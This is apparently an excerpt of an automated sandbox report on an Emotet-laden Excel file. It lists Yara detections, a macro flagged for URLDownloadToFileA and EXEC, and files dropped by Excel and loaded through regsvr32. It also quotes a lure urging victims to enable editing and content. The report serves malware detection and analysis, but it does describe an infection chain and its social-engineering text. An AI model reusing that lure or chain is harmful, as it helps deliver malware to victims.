Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003684C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Found malicious Excel 4.0 Macro

Source: Documento.xlsm	Macro extractor: Sheet: EFWFSFG contains: URLDownloadToFileA
Source: Documento.xlsm	Macro extractor: Sheet: EFWFSFG contains: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12	Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\xxw1.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll			Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: Documento.xlsm	Initial sample: EXEC
Source: Documento.xlsm	Initial sample: EXEC

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10049274
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003D636
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004380C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004D8FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001B9A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004FAC1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003DB09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004DE3E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003DEDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003C1E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003E2E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004E380
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10012490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003E709
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004EA44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004AB9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10044FE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B8131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A82D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A8844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A4B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B4E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C0E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A8FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A50CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C13A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C1E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BFECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AC151
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BE168
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A22F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A4313
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C23B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AA4DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AE4F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AC4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B0503
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C05F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BE5ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AE65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BA683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B66C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B86EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A2710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B2783
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BA916
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B490E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B8966
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B6998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AA9CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C0A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001ACA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B2B1F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AED0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001ACDE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B6E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AAEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BEEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B8EF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BAF0B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A2F36
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BCFA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A7013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B9054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B7098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B3094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BD15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B519C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A71E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B3231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B9285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A9343
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001AD4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BD4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A958A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B35A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BF5D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B7730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A7761
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B17D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BF7F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B3983
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BF9AF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C1A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B9A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A1A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BFAD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001ABB14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B1B29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B7B9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A9C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BBD63
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A1DCA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B7E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001B3E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001BDF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A3F5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001C1FC7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00250E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00238844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00251E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00244E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002350CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024FECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002382D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00248131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024D15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002513A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00238FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00243231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023CA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00250A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00249A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00251A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00237013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00239C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00249054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023E65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00231A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024D4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023AEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023D4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00249285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024A683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00243E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00243094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00246E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023C4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002486EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002322F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023E4F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00248EF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024EEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002466C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024FAD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023A4DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00241B29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024DF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00232F36
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00240503
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023ED0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024490E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024AF0B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234313
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024A916
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00232710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023BB14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00242B1F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00237761
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00248966
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024BD63
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E168
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00239343
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023C151
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00233F5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024CFA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002435A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024F9AF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002523B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00243983
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00242783
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023958A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024519C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247B9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00246998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002371E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023CDE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E5ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024F7F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002505F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00251FC7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00231DCA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023A9CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002417D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024F5D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00320E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00314E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00308844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00321E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003082D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031FECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003050CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00318131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031D15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00304B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003213A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00308FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00313231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00317E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030CA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00307013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00309C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00320A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00321A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00319A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00319054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030E65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00301A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030AEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030D4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031D4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00313094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00316E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00317098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031A683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00319285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00313E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030E4F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003022F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00318EF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030C4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003186EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031FAD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030A4DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031EEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003166C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00317730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00302F36
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00311B29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031DF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00302710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00304313
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030BB14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031A916
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00312B1F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00310503
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031AF0B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030ED0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031490E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00307761
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031BD63
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00318966
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031E168
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030C151
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00303F5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00309343
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003223B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031CFA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003135A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031F9AF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00316998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031519C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00317B9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00313983
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00312783
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030958A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003205F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031F7F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030CDE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003071E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031E5ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003117D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0031F5D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00321FC7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00301DCA
